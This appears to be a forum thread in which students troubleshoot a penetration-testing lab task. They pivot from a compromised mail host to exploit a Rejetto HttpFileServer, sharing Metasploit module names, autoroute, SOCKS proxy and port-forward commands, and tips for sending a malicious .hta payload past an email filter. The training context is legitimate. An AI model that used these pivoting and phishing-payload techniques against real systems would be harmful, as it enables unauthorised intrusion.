I am stuck on Task 3: Exploit a vulnerable file server on web.prod.local. Any guidance would be appreciated
I know the server is Rejetto HttpFileServer httpd 2.3 after enumeration and using remote port forwarding. Also setup the autoroute through Meterpreter so can ping it from the first compromised host, mail.server.local. Been trying to use the rejetto_hfs_exec metasploit module, i’ve tried a bind shell and a reverse_tcp shell but am unable to exploit web.prod.local. Can someone explain to me what I am doing wrong please
I have the same issue. I’ve tried attacking web.prod.local in every possible way, but nothing works.
I thought there might be a problem with the lab, so I contacted support, but they told me everything is working fine and that the rejetto_hfs_exec module is not the correct method.
I’ve been struggling with this one as well. I have used both different rejetto exploits. With different payloads, tried it with proxies and with port-forwarding.
No matter what I do it seems I am never able to get a shell. I have reached a point where I am not sure what I am supposed to be trying next anymore.
I tried my hand at it again today. I fiddled around with a more responsive version of the correct rejetto exploit for a bit, to confirm it worked properly. And it did, so the flaw was with how I used it in metasploit somewhere. I ended up using a reverse shell to get access.
This is the portfwding I used to get a connection back.
portfwd add -R -L kaliIP -l kaliport5555 -p pivotport6666
I have a feeling this may not have been the intended way to do it, but for the life of me I could not get a bind_tcp to work.
When using the send_mail.py script, I get a reply from the SMTP server that the file type (.exe) is not allowed.
I then wrote a small script to test different executable file types, and I found only one type that is not blocked by the mail server (.hta). When sending a malicious .hta payload, i do not receive a callback to my listener.
Am I missing something trivial here? This feels like a weird point to get stuck!
This Thread is a bit old, and I would like to think you all have already passed this skills check, but I will write this for anyone searching this up in the future, cuz they’re stuck xD, since I just solved it.
So instead of using Metasploit to exploit it, search online for a downloadable exploit that might work
Keep at it, and if you have any more questions, please message me.
hope that help i run the sendemail task direcly in and dont try an exe. its blocked directly it worked on my side with .hta > and the listener i set up was not working with msfconsole so i try it with the normal nc -lvnp 4444
hope that helps. rg, tom
Hi all, I managed to get it to work by generating a .hta payload, and setting up a multi/handler in Metasploit. Turns out I was just not patient enough: the “recipient” on the other side executes the .hta after a minute or so (or maybe 2). So the standard way does work!
I haven’t had a lot of time to tackle Task 4, but I will edit this post if I clear that one.
Thank you for providing the guide above for task 2. I passed task 2 but now I still have no clue on how to work on task 3…
I tried these following command to set up socks proxy and nmap with proxy chain.
Summary
run autoroute <web.prod.local’ip>-s /20
search socks_proxy
use 0
set SRVPORT 9050
set VERSION 4a
exploit
jobs
proxychains nmap web.prod.local -sT -Pn -F
portfwd add -R -L -l 5555 -p 6666
the nmap only show http on 80 for web.prod.local, how do you guys know it is rejetto?
And I tried rejetto_hfs_rce_cve_2024_23692, but not sure which payload should I use and what config should I use, how should I proceed?
